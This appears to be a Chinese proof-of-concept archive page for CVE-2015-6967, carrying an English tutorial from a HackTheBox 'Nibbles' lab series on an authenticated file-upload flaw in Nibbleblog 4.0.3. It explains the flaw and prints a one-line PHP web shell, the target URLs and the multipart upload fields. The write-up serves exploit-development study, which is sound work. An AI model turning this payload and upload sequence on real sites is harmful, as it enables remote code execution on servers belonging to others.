POC详情: f1e0522372f94508d3e20700ee72c42dcda6a78c

来源
关联漏洞
标题: Nibbleblog 代码注入漏洞 (CVE-2015-6967)
描述:NibbleBlog是一套博客引擎。 Nibbleblog 4.0.5之前版本的My Image插件中存在任意文件上传漏洞。远程攻击者可通过上传可执行文件,并发送直接的请求访问该文件利用该漏洞执行任意代码。
介绍
# ExploitDev Journey #9 | CVE-2015-6967 | Nibbleblog 4.0.3 - Arbitrary File Upload
Original Exploit: https://www.exploit-db.com/exploits/38489 <br>

**Exploit name:** Nibbleblog 4.0.3 RCE <br>
**CVE**: 2015-6967 <br>
**Lab**: Nibbles - HackTheBox


### Description
There is a flaw in Nibbleblog 4.0.3 that allows an authenticated user to upload shells. Uploading shells here is kind of different from what you have already seen before, you can name your shell `r57.php` however that doesn't matter because it can only be accessed through `image.php`. So in a way you are basically overwriting the contents of `image.php` with your payload but that's not the case. You upload files with whatever name you want but you can only access them by using the `image.php` name.

<br>

### How it works
In this session, you won't actually need the `gen_random_charset()` function because there is no point in naming your shell something unique. Here is how it works:
- You authenticate to the website using a username and password
- You upload an image through the plugins section of nibbleblog
- You open your shell and do business as usual

<br>

### Writing the exploit
First we define some important variables:
```py
login_url = f'{rhost}/nibbleblog/admin.php'
image_url = f"{rhost}/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image"
payload = '<?php echo shell_exec($_GET["rce"]); ?>'
shell_path = f"{rhost}/nibbleblog/content/private/plugins/my_image/image.php"
```

You are familiar with them all except that `shell_path` is just going to open `image.php` and not some file generated with random charset. <br>
You were already already introduced to session management in Python and you already know how to login to an application, this application is no different than what you have already seen before.

The POST data that you are going to send is kind of long and might look odd to you:
```py
data = {
        "plugin": (None, 'my_image'), "title": (None, 'My image'), "position": (None, 4), "caption": "",
        "image": ('doesnt_matter.php', payload, "application/x-php", {'Content-Disposition': 'form-data'}),
        "image_resize": (None, 1), "image_width": (None, 200), "image_height": (None, 200), "image_option": (None, 'auto')
    }
```

The reason is the application expects some weird data like title of the image, position, caption, height and width, etc. The rest of the exploit is self-explanatory and should be easy for you to understand.

<br>

### Final thoughts
In this exploit development session you learned that not all applications allow you to upload your own files with custom names. Some applications operate differently and this web app is one of them, we didn't have a say in choosing a name here, our file would be uploaded as `image.php` which isn't bad. At last all we need is the shell.
文件快照

[4.0K] /data/pocs/f1e0522372f94508d3e20700ee72c42dcda6a78c ├── [2.4K] exploit.py └── [2.8K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。